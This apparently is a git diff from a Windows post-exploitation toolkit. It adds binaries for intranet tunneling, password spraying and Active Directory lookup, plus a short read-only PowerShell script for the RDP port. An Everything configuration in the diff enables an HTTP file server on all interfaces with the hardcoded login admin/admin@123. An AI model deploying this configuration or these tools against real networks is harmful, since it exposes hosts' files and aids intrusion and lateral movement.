+show_size_in_statusbar=0 +statusbar_size_format=0 +open_folder_command2= +open_file_command2= +open_path_command2= +explore_command2= +explore_path_command2= +window_title_format= +taskbar_notification_title_format= +instance_name= +translucent_selection_rectangle_alpha=70 +min_zoom=-6 +max_zoom=27 +context_menu_type=0 +context_menu_shell_extensions=1 +auto_include_fixed_volumes=1 +auto_include_removable_volumes=0 +auto_remove_offline_ntfs_volumes=1 +auto_remove_moved_ntfs_volumes=1 +auto_include_fixed_refs_volumes=1 +auto_include_removable_refs_volumes=0 +auto_remove_offline_refs_volumes=1 +auto_remove_moved_refs_volumes=1 +find_mount_points_on_removable_volumes=0 +last_export_type=0 +max_threads=0 +reuse_threads=1 +find_subfolders_and_files_max_threads=0 +single_parent_context_menu=0 +auto_size_1=512 +auto_size_2=640 +auto_size_3=768 
+auto_size_aspect_ratio_x=9 +auto_size_aspect_ratio_y=7 +auto_size_width_only=0 +auto_size_path_x=1 +auto_size_path_y=2 +sticky_vscroll_bottom=1 +last_options_page=17 +draw_focus_rect=1 +date_format= +time_format= +listview_item_high=0 +single_click_open=0 +underline_icon_titles=0 +icons_only=0 +icon_shell_extensions=1 +auto_scroll_repeat_delay=250 +auto_scroll_repeat_rate=50 +open_many_files_warning_threshold=16 +set_foreground_window_attach_thread_input=0 +debug=0 +debug_log=0 +verbose=0 +lvm=1 +ipc=1 +home_match_case=0 +home_match_whole_word=0 +home_match_path=0 +home_match_diacritics=0 +home_regex=0 +home_search=1 +home_filter=0 +home_sort=0 +home_view=0 +home_index=1 +allow_multiple_windows_from_tray=0 +single_click_tray=0 +close_on_execute=0 +double_click_path=0 +update_display_after_scroll=0 +update_display_after_mask=1 +auto_scroll_view=0 +double_quote_copy_as_path=0 +snap=0 +snaplen=10 +rename_select_filepart_only=0 +rename_move_caret_to_selection_end=0 +rename_nav=0 +search_edit_move_caret_to_selection_end=0 +search_edit_drag_accept_files=0 +select_search_on_mouse_click=1 +focus_search_on_activate=0 +reset_vscroll_on_search=1 +wrap_focus=0 +load_icon_priority=0 +load_thumbnail_priority=0 +load_fileinfo_priority=0 +always_request_all_fileinfo=0 +header_high=0 +hide_on_close=0 +max_hidden_windows=0x00000000 +winmm=0 +menu_escape_amp=1 +menu_folders=0 +menu_folder_separator= +menu_items_per_column=0 +new_inherit=1 +full_row_select=0 +tray_show_command_line= +dpi=96 +ctrl_mouse_wheel_action=1 +allow_open=1 +allow_context_menu=1 +allow_delete=1 +allow_rename=1 +allow_cut=1 +allow_copy=1 +allow_paste=1 +allow_drag_drop=1 +allow_window_message_filter_dragdrop=0 +auto_column_widths=0 +hotkey_explorer_path_search=0 +get_key_name_text=1 +paste_new_line_op=0 +esc_cancel_action=1 +fast_ascii_search=1 +match_path_when_search_contains_path_separator=1 +allow_literal_operators=0 +allow_round_bracket_parenthesis=0 +expand_environment_variables=0 +search_as_you_type=1 
+always_update_query_on_search_parameter_change=0 +convert_forward_slash_to_backslash=0 +match_whole_filename_when_using_wildcards=1 +operator_precedence=0 +replace_exact_trailing_star_dot_star_with_star=1 +allow_exclamation_point_not=1 +search_command_prefix= +auto_complete_search_command=1 +double_buffer=1 +search= +show_number_of_results_with_selection=0 +date_descending_first=0 +size_descending_first=0 +size_format=2 +alpha_select=0 +tooltips=1 +listview_tooltips=1 +show_detailed_listview_tooltips=1 +rtl_listview_edit=0 +force_path_ltr_order=1 +force_path_left_align=1 +date_time_order=0 +date_time_align=1 +size_align=3 +invert_layout=0 +update_layout_on_input_language_change=0 +control_shift_action=3 +change_search_rtl_reading_action=3 +invert_layout_action=3 +bookmark_remember_case=1 +bookmark_remember_wholeword=1 +bookmark_remember_path=1 +bookmark_remember_diacritic=1 +bookmark_remember_regex=1 +bookmark_remember_sort=1 +bookmark_remember_view=1 +bookmark_remember_filter=1 +bookmark_remember_index=1 +bookmark_remember_search=1 +bookmark_organize_x=0 +bookmark_organize_y=0 +bookmark_organize_wide=0 +bookmark_organize_high=0 +exclude_list_enabled=1 +exclude_hidden_files_and_folders=0 +exclude_system_files_and_folders=0 +include_only_files= +exclude_files= +db_location= +db_multi_user_filename=0 +db_compress=0 +index_size=1 +fast_size_sort=1 +index_date_created=0 +fast_date_created_sort=0 +index_date_modified=1 +fast_date_modified_sort=1 +index_date_accessed=0 +fast_date_accessed_sort=0 +index_attributes=0 +fast_attributes_sort=0 +index_folder_size=0 +fast_path_sort=1 +fast_extension_sort=0 +extended_information_cache_monitor=1 +db_update_thread_priority=-15 +index_recent_changes=1 +refs_file_id_extd_directory_info_buffer_size=0 +folder_update_thread_mode_background=0 +folder_update_rescan_asap=1 +monitor_thread_mode_background=1 +monitor_retry_delay=30000 +monitor_update_delay=1000 +monitor_pause=0 +usn_record_filter=0xffffffff +cancel_delay=0x000003e8 
+allow_ntfs_open_file_by_id=1 +always_update_folder_recent_change=0 +editor_x=0 +editor_y=0 +editor_wide=0 +editor_high=0 +editor_maximized=0 +file_list_relative_paths=0 +rename_x=0 +rename_y=0 +rename_wide=0 +rename_high=0 +rename_match_case=0 +rename_regex=0 +advanced_copy_to_x=0 +advanced_copy_to_y=0 +advanced_copy_to_wide=0 +advanced_copy_to_high=0 +advanced_copy_to_match_case=0 +advanced_copy_to_regex=0 +advanced_move_to_x=0 +advanced_move_to_y=0 +advanced_move_to_wide=0 +advanced_move_to_high=0 +advanced_move_to_match_case=0 +advanced_move_to_regex=0 +advanced_search_x=0 +advanced_search_y=0 +advanced_search_wide=0 +advanced_search_high=0 +advanced_search_page_y_offset=0 +advanced_search_focus_id=0 +advanced_search_warnings=1 +max_recv_size=8388608 +display_full_path_name=0 +size_tiny=10240 +size_small=102400 +size_medium=1048576 +size_large=16777216 +size_huge=134217728 +themed_toolbar=1 +show_copy_name=2 +show_copy_path=2 +show_copy_full_name=2 +show_open_path=2 +show_explore=2 +show_explore_path=2 +copy_path_folder_append_backslash=0 +custom_verb01= +custom_verb02= +custom_verb03= +custom_verb04= +custom_verb05= +custom_verb06= +custom_verb07= +custom_verb08= +custom_verb09= +custom_verb10= +custom_verb11= +custom_verb12= +filters_visible=0 +filters_wide=128 +filters_right_align=1 +filters_tab_stop=0 +filter= +filter_everything_name= +filter_organize_x=0 +filter_organize_y=0 +filter_organize_wide=0 +filter_organize_high=0 +preview_visible=0 +preview_x=640 +preview_tab_stop=0 +preview_mag_filter=0 +preview_min_filter=0 +preview_fill=0 +show_preview_handlers_in_preview_pane=0 +preview_load_size=0 +preview_context=0x00000000 +preview_release_handler_on_clear=0 +sort=Run Count +sort_ascending=0 +always_keep_sort=0 +index=0 +index_file_list= +index_etp_server= +index_link_type=1 +status_bar_visible=1 +select_search_on_focus_mode=1 +select_search_on_set_mode=2 +search_history_enabled=0 +run_history_enabled=1 +search_history_days_to_keep=90 
+run_history_days_to_keep=90 +search_history_keep_forever=1 +run_history_keep_forever=1 +search_history_always_suggest=0 +search_history_always_suggest_extend_toolbar=0 +search_history_visible_count_max=12 +search_history_always_suggest_visible_count_max=1 +search_history_show_all_max=256 +search_history_suggestion_max=256 +search_history_show_all_sort=2 +search_history_suggestion_sort=1 +search_history_show_above=0 +search_history_sort=2 +search_history_sort_ascending=0 +search_history_x=0 +search_history_y=0 +search_history_wide=0 +search_history_high=0 +search_history_column_search_wide=208 +search_history_column_search_order=0 +search_history_column_count_wide=128 +search_history_column_count_order=1 +search_history_column_date_wide=128 +search_history_column_date_order=2 +etp_server_enabled=0 +etp_server_bindings= +etp_server_port=21 +etp_server_username= +etp_server_password= +etp_server_welcome_message= +etp_server_log_file_name= +etp_server_logging_enabled=0 +etp_server_log_max_size=4194304 +etp_server_log_delta_size=524288 +etp_server_allow_file_download=1 +ftp_allow_port=1 +ftp_check_data_connection_ip=1 +http_server_enabled=1 +http_server_bindings=0.0.0.0 +http_title_format= +http_server_port=65535 +http_server_username=admin +http_server_password=admin@123 +http_server_home= +http_server_default_page= +http_server_log_file_name= +http_server_logging_enabled=0 +http_server_log_max_size=419430400 +http_server_log_delta_size=524288 +http_server_allow_file_download=1 +http_server_items_per_page=32 +http_server_show_drive_labels=0 +http_server_strings= +http_server_access_control_allow_origin= +service_pipe_name= +name_column_pos=0 +name_column_width=256 +path_column_visible=1 +path_column_pos=1 +path_column_width=256 +size_column_visible=1 +size_column_pos=2 +size_column_width=96 +extension_column_visible=0 +extension_column_pos=3 +extension_column_width=96 +type_column_visible=0 +type_column_pos=4 +type_column_width=96 +last_write_time_column_visible=1 
+last_write_time_column_pos=3 +last_write_time_column_width=153 +creation_time_column_visible=0 +creation_time_column_pos=6 +creation_time_column_width=153 +date_accessed_column_visible=0 +date_accessed_column_pos=7 +date_accessed_column_width=153 +attribute_column_visible=0 +attribute_column_pos=8 +attribute_column_width=70 +date_recently_changed_column_visible=0 +date_recently_changed_column_pos=9 +date_recently_changed_column_width=153 +run_count_column_visible=0 +run_count_column_pos=10 +run_count_column_width=96 +date_run_column_visible=0 +date_run_column_pos=11 +date_run_column_width=153 +file_list_filename_column_visible=0 +file_list_filename_column_pos=12 +file_list_filename_column_width=96 +translucent_selection_rectangle_background_color= +translucent_selection_rectangle_border_color= +thumbnail_mouseover_border_color= +preview_background_color= +ntfs_volume_guids="\\\\?\\Volume{2d28957f-5c9e-11ea-88a5-806e6f6e6963}","\\\\?\\Volume{319a4f45-c20d-11ea-8074-806e6f6e6963}" +ntfs_volume_paths="C:","C:" +ntfs_volume_roots="","" +ntfs_volume_includes=1,1 +ntfs_volume_load_recent_changes=0,0 +ntfs_volume_include_onlys="","" +ntfs_volume_monitors=1,1 +refs_volume_guids= +refs_volume_paths= +refs_volume_roots= +refs_volume_includes= +refs_volume_load_recent_changes= +refs_volume_include_onlys= +refs_volume_monitors= +filelists= +filelist_monitor_changes= +folders= +folder_monitor_changes= +folder_buffer_size_list= +folder_rescan_if_full_list= +folder_update_types= +folder_update_days= +folder_update_ats= +folder_update_intervals= +folder_update_interval_types= +exclude_folders= +connect_history_hosts= +connect_history_ports= +connect_history_usernames= +connect_history_link_types= +etp_client_rewrite_patterns= +etp_client_rewrite_substitutions= +file_new_search_window_keys=334 +file_open_file_list_keys=335 +file_close_file_list_keys= +file_close_keys=343,27 +file_export_keys=339 +file_copy_full_name_to_clipboard_keys=9539 +file_copy_path_to_clipboard_keys= 
+file_set_run_count_keys= +file_create_shortcut_keys= +file_delete_keys=8238 +file_delete_permanently_keys=9262 +file_edit_keys= +file_open_keys=8205 +file_open_selection_and_close_everything_keys= +file_explore_path_keys= +file_open_new_keys= +file_open_path_keys=8461 +file_open_with_keys= +file_open_with_default_verb_keys= +file_play_keys= +file_preview_keys= +file_print_keys= +file_print_to_keys= +file_properties_keys=8717 +file_read_extended_information_keys=8517 +file_rename_keys=8305 +file_run_as_keys= +file_exit_keys=337 +file_copy_name_to_clipboard_keys= +file_open_selection_and_do_not_close_everything_keys= +file_open_most_run_keys= +file_open_last_run_keys= +file_custom_verb_1_keys= +file_custom_verb_2_keys= +file_custom_verb_3_keys= +file_custom_verb_4_keys= +file_custom_verb_5_keys= +file_custom_verb_6_keys= +file_custom_verb_7_keys= +file_custom_verb_8_keys= +file_custom_verb_9_keys= +file_custom_verb_10_keys= +file_custom_verb_11_keys= +file_custom_verb_12_keys= +indexes_folders_rescan_all_now_keys= +indexes_force_rebuild_keys= +edit_cut_keys=8536 +edit_copy_keys=8515,8493 +edit_paste_keys=8534,9261 +edit_select_all_keys=8513 +edit_invert_selection_keys= +edit_copy_to_folder_keys= +edit_move_to_folder_keys= +edit_advanced_advanced_copy_to_folder_keys= +edit_advanced_advanced_move_to_folder_keys= +view_filters_keys= +view_preview_keys=592 +view_status_bar_keys= +view_details_keys=1334 +view_medium_thumbnails_keys=1331 +view_large_thumbnails_keys=1330 +view_extra_large_thumbnails_keys=1329 +view_increase_thumbnail_size_keys=1467 +view_decrease_thumbnail_size_keys=1469 +view_window_size_small_keys=561 +view_window_size_medium_keys=562 +view_window_size_large_keys=563 +view_window_size_auto_fit_keys=564 +view_zoom_zoom_in_keys=443 +view_zoom_zoom_out_keys=445 +view_zoom_reset_keys=304,352 +view_go_to_back_keys=549,166 +view_go_to_forward_keys=551,167 +view_go_to_home_keys=548 +view_go_to_show_all_history_keys=1352,328 +view_sort_by_name_keys=305 
+view_sort_by_path_keys=306 +view_sort_by_size_keys=307 +view_sort_by_extension_keys=308 +view_sort_by_type_keys=309 +view_sort_by_date_modified_keys=310 +view_sort_by_date_created_keys=311 +view_sort_by_attributes_keys=312 +view_sort_by_file_list_filename_keys= +view_sort_by_run_count_keys= +view_sort_by_date_run_keys= +view_sort_by_date_recently_changed_keys=313 +view_sort_by_date_accessed_keys= +view_sort_by_ascending_keys= +view_sort_by_descending_keys= +view_refresh_keys=116 +view_fullscreen_keys=122 +view_toggle_ltrrtl_direction_keys= +view_on_top_never_keys= +view_on_top_always_keys= +view_on_top_while_searching_keys= +search_match_case_keys=329 +search_match_whole_word_keys=322 +search_match_path_keys=341 +search_match_diacritics_keys=333 +search_enable_regex_keys=338 +search_advanced_search_keys= +search_add_to_filters_keys= +search_organize_filters_keys=1350 +bookmarks_add_to_bookmarks_keys=324 +bookmarks_organize_bookmarks_keys=1346 +tools_options_keys=336 +tools_console_keys=448 +tools_file_list_editor_keys= +tools_connect_to_etp_server_keys= +tools_disconnect_from_etp_server_keys= +help_everything_help_keys=112 +help_search_syntax_keys= +help_regex_syntax_keys= +help_command_line_options_keys= +help_everything_website_keys= +help_check_for_updates_keys= +help_about_everything_keys=368 +help_donate_keys= +search_edit_focus_search_edit_keys=326,114,580 +search_edit_delete_previous_word_keys=4360 +search_edit_auto_complete_search_keys=4384 +search_edit_show_search_history_keys= +search_edit_show_all_search_history_keys=4646,4648 +result_list_item_up_keys=8230,4134 +result_list_item_down_keys=8232,4136 +result_list_page_up_keys=8225,4129 +result_list_page_down_keys=8226,4130 +result_list_start_of_list_keys=8228 +result_list_end_of_list_keys=8227 +result_list_item_up_extend_keys=9254,5158 +result_list_item_down_extend_keys=9256,5160 +result_list_page_up_extend_keys=9249,5153 +result_list_page_down_extend_keys=9250,5154 
+result_list_start_of_list_extend_keys=9252 +result_list_end_of_list_extend_keys=9251 +result_list_focus_up_keys=8486,4390 +result_list_focus_down_keys=8488,4392 +result_list_focus_page_up_keys=8481,4385 +result_list_focus_page_down_keys=8482,4386 +result_list_focus_start_of_list_keys=8484 +result_list_focus_end_of_list_keys=8483 +result_list_focus_up_extend_keys=9510,5414 +result_list_focus_down_extend_keys=9512,5416 +result_list_focus_page_up_extend_keys=9505,5409 +result_list_focus_page_down_extend_keys=9506,5410 +result_list_focus_start_of_list_extend_keys=9508 +result_list_focus_end_of_list_extend_keys=9507 +result_list_focus_result_list_keys= +result_list_focus_highest_run_count_result_keys= +result_list_focus_last_run_result_keys= +result_list_toggle_path_column_keys= +result_list_toggle_size_column_keys= +result_list_toggle_extension_column_keys= +result_list_toggle_type_column_keys= +result_list_toggle_date_modified_column_keys= +result_list_toggle_date_created_column_keys= +result_list_toggle_attributes_column_keys= +result_list_toggle_file_list_filename_column_keys= +result_list_toggle_run_count_column_keys= +result_list_toggle_date_recently_changed_column_keys= +result_list_toggle_date_accessed_column_keys= +result_list_toggle_date_run_column_keys= +result_list_size_all_columns_to_fit_keys=8555 +result_list_size_result_list_to_fit_keys= +result_list_context_menu_keys=9337 +result_list_scroll_left_or_thumbnail_left_keys=8229 +result_list_scroll_right_or_thumbnail_right_keys=8231 +result_list_scroll_page_left_or_thumbnail_focus_left_keys=8485 +result_list_scroll_page_right_or_thumbnail_focus_right_keys=8487 +result_list_left_extend_keys=9253 +result_list_right_extend_keys=9255 +result_list_focus_left_extend_keys=9509 +result_list_focus_right_extend_keys=9511 +result_list_select_focus_keys=8224 +result_list_toggle_focus_selection_keys=8480 +result_list_copy_as_csv_keys= +preview_focus_preview_keys= +result_list_font= +result_list_font_size= 
+search_edit_font= +search_edit_font_size= +status_bar_font= +status_bar_font_size= +header_font= +header_font_size= +normal_background_color= +normal_foreground_color= +normal_bold= +highlighted_background_color= +highlighted_foreground_color= +highlighted_bold= +current_sort_background_color= +current_sort_foreground_color= +current_sort_bold= +current_sort_highlighted_background_color= +current_sort_highlighted_foreground_color= +current_sort_highlighted_bold= +selected_background_color= +selected_foreground_color= +selected_bold= +selected_highlighted_background_color= +selected_highlighted_foreground_color= +selected_highlighted_bold= +selected_inactive_background_color= +selected_inactive_foreground_color= +selected_inactive_bold= +selected_inactive_highlighted_background_color= +selected_inactive_highlighted_foreground_color= +selected_inactive_highlighted_bold= +drop_target_background_color= +drop_target_foreground_color= +drop_target_bold= +drop_target_highlighted_background_color= +drop_target_highlighted_foreground_color= +drop_target_highlighted_bold= +mouseover_background_color= +mouseover_foreground_color= +mouseover_bold= +mouseover_highlighted_background_color= +mouseover_highlighted_foreground_color= +mouseover_highlighted_bold= +mouseover_current_sort_background_color= +mouseover_current_sort_foreground_color= +mouseover_current_sort_bold= +mouseover_current_sort_highlighted_background_color= +mouseover_current_sort_highlighted_foreground_color= +mouseover_current_sort_highlighted_bold= +alternate_row_background_color= +alternate_row_foreground_color= +alternate_row_bold= +alternate_row_highlighted_background_color= +alternate_row_highlighted_foreground_color= +alternate_row_highlighted_bold= +current_sort_alternate_row_background_color= +current_sort_alternate_row_foreground_color= +current_sort_alternate_row_bold= +current_sort_alternate_row_highlighted_background_color= +current_sort_alternate_row_highlighted_foreground_color= 
+current_sort_alternate_row_highlighted_bold= +hot_background_color= +hot_foreground_color= +hot_bold= +hot_highlighted_background_color= +hot_highlighted_foreground_color= +hot_highlighted_bold= +selected_hot_background_color= +selected_hot_foreground_color= +selected_hot_bold= +selected_hot_highlighted_background_color= +selected_hot_highlighted_foreground_color= +selected_hot_highlighted_bold= +selected_inactive_hot_background_color= +selected_inactive_hot_foreground_color= +selected_inactive_hot_bold= +selected_inactive_hot_highlighted_background_color= +selected_inactive_hot_highlighted_foreground_color= +selected_inactive_hot_highlighted_bold= +thumbnail_mouseover_background_color= +thumbnail_mouseover_foreground_color= +thumbnail_mouseover_bold= +thumbnail_mouseover_highlighted_background_color= +thumbnail_mouseover_highlighted_foreground_color= +thumbnail_mouseover_highlighted_bold= diff --git a/English/scripts/Intranet agent/frpcx.exe b/English/scripts/Intranet agent/frpcx.exe new file mode 100644 index 0000000..78b468e Binary files /dev/null and b/English/scripts/Intranet agent/frpcx.exe differ diff --git a/English/scripts/Intranet agent/iox.exe b/English/scripts/Intranet agent/iox.exe new file mode 100644 index 0000000..b6834ed Binary files /dev/null and b/English/scripts/Intranet agent/iox.exe differ diff --git a/English/scripts/Intranet agent/nb.exe b/English/scripts/Intranet agent/nb.exe new file mode 100644 index 0000000..f8e9db6 Binary files /dev/null and b/English/scripts/Intranet agent/nb.exe differ diff --git a/English/scripts/Intranet agent/npc.exe b/English/scripts/Intranet agent/npc.exe new file mode 100644 index 0000000..8b07169 Binary files /dev/null and b/English/scripts/Intranet agent/npc.exe differ diff --git a/English/scripts/Intranet scanning/SharpSpray.exe b/English/scripts/Intranet scanning/SharpSpray.exe new file mode 100644 index 0000000..cdee55e Binary files /dev/null and b/English/scripts/Intranet scanning/SharpSpray.exe differ 
diff --git a/English/scripts/Intranet scanning/SharpWebScan.exe b/English/scripts/Intranet scanning/SharpWebScan.exe
new file mode 100644
index 0000000..17f2977
Binary files /dev/null and b/English/scripts/Intranet scanning/SharpWebScan.exe differ
diff --git a/English/scripts/Intranet scanning/TailorScan.exe b/English/scripts/Intranet scanning/TailorScan.exe
new file mode 100644
index 0000000..c3f66bb
Binary files /dev/null and b/English/scripts/Intranet scanning/TailorScan.exe differ
diff --git a/English/scripts/Intranet scanning/fscan.exe b/English/scripts/Intranet scanning/fscan.exe
new file mode 100644
index 0000000..de733d3
Binary files /dev/null and b/English/scripts/Intranet scanning/fscan.exe differ
diff --git a/English/scripts/Locate AD/PVEFindADUser.exe b/English/scripts/Locate AD/PVEFindADUser.exe
new file mode 100644
index 0000000..b2c0d4f
Binary files /dev/null and b/English/scripts/Locate AD/PVEFindADUser.exe differ
diff --git a/English/scripts/Locate AD/PsLoggedon.exe b/English/scripts/Locate AD/PsLoggedon.exe
new file mode 100644
index 0000000..04b6dfd
Binary files /dev/null and b/English/scripts/Locate AD/PsLoggedon.exe differ
diff --git a/English/scripts/Locate AD/netview.exe b/English/scripts/Locate AD/netview.exe
new file mode 100644
index 0000000..0d89864
Binary files /dev/null and b/English/scripts/Locate AD/netview.exe differ
diff --git a/English/scripts/RDP/RegRdpPort.ps1 b/English/scripts/RDP/RegRdpPort.ps1
new file mode 100644
index 0000000..e1a3063
--- /dev/null
+++ b/English/scripts/RDP/RegRdpPort.ps1
@@ -0,0 +1,6 @@
+function RegRdpPort {
+ $RegPath = "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
+ $RDPportValue = (Get-ItemProperty -Path $RegPath -ErrorAction Stop).PortNumber
+
+ write-host "RDP-Tcp PortNumber: "$RDPportValue
+}
\ No newline at end of file
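Review bot: The `write-host` line in `RegRdpPort` places the label string and `$RDPportValue` side by side, which PowerShell appears to parse as two separate arguments, and it writes to the host rather than the output stream, so a caller cannot pipe or capture the port value reliably. `Write-Output "RDP-Tcp PortNumber: $RDPportValue"` keeps the same text in one interpolated string and puts it on the pipeline. `Get-ItemProperty` runs with `-ErrorAction Stop` but there is no `try`/`catch` around it, so a missing key or a denied read surfaces as a raw terminating error instead of a clear message. The function also has no help comment; a single line above it such as `# Reads PortNumber from the RDP-Tcp WinStation key (read-only, changes nothing)` would make its scope plain to anyone auditing the script.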
diff --git a/scripts/.DS_Store b/scripts/.DS_Store
deleted file mode 100644
index d0d79bf..0000000
Binary files a/scripts/.DS_Store and /dev/null differ
diff --git a/scripts/Auxiliary/.DS_Store b/scripts/Auxiliary/.DS_Store
deleted file mode 100644
index dbbd762..0000000
Binary files a/scripts/Auxiliary/.DS_Store and /dev/null differ
diff --git a/scripts/Grab password/.DS_Store b/scripts/Grab password/.DS_Store
deleted file mode 100644
index 5b98baa..0000000
Binary files a/scripts/Grab password/.DS_Store and /dev/null differ
diff --git a/scripts/Information collection/.DS_Store b/scripts/Information collection/.DS_Store
deleted file mode 100644
index ea244eb..0000000
Binary files a/scripts/Information collection/.DS_Store and /dev/null differ
diff --git a/scripts/Intranet agent/.DS_Store b/scripts/Intranet agent/.DS_Store
deleted file mode 100644
index a97eea3..0000000
Binary files a/scripts/Intranet agent/.DS_Store and /dev/null differ
diff --git a/scripts/Intranet scanning/.DS_Store b/scripts/Intranet scanning/.DS_Store
deleted file mode 100644
index 452c880..0000000
Binary files a/scripts/Intranet scanning/.DS_Store and /dev/null differ
diff --git a/scripts/Locate AD/.DS_Store b/scripts/Locate AD/.DS_Store
deleted file mode 100644
index 0160f34..0000000
Binary files a/scripts/Locate AD/.DS_Store and /dev/null differ